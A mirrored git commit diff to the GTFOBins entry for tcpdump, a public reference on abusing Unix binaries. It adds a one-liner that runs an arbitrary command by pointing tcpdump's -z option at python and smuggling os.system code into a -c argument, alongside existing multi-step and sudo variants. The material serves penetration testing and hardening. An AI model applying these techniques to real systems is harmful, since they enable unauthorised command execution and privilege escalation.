mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 06:19:27 +01:00
Update tcpdump (adding one-line with arbitrary command)
This commit is contained in:
parent
2afe22a27b
commit
387651d444
@ -5,12 +5,16 @@ description: |
|
|||||||
In recent distributions (e.g., Debian 10 and Ubuntu 18) AppArmor limits the `postrotate-command` to a small subset of predefined commands thus preventing the execution of the following.
|
In recent distributions (e.g., Debian 10 and Ubuntu 18) AppArmor limits the `postrotate-command` to a small subset of predefined commands thus preventing the execution of the following.
|
||||||
functions:
|
functions:
|
||||||
command:
|
command:
|
||||||
- code: |
|
- description: This requires several commands.
|
||||||
|
code: |
|
||||||
COMMAND='id'
|
COMMAND='id'
|
||||||
TF=$(mktemp)
|
TF=$(mktemp)
|
||||||
echo "$COMMAND" > $TF
|
echo "$COMMAND" > $TF
|
||||||
chmod +x $TF
|
chmod +x $TF
|
||||||
tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
|
tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
|
||||||
|
- descprition: One-liner to run arbitrary command leveraging python argument parser that does not require a space between the option -c and the value.
|
||||||
|
code: |
|
||||||
|
tcpdump -ln -i lo -w -c__import__\(\"os\"\).system\(\"id\"\) -W 1 -G 1 -z /usr/bin/python
|
||||||
sudo:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
COMMAND='id'
|
COMMAND='id'
|
||||||
|
Loading…
Reference in New Issue
Block a user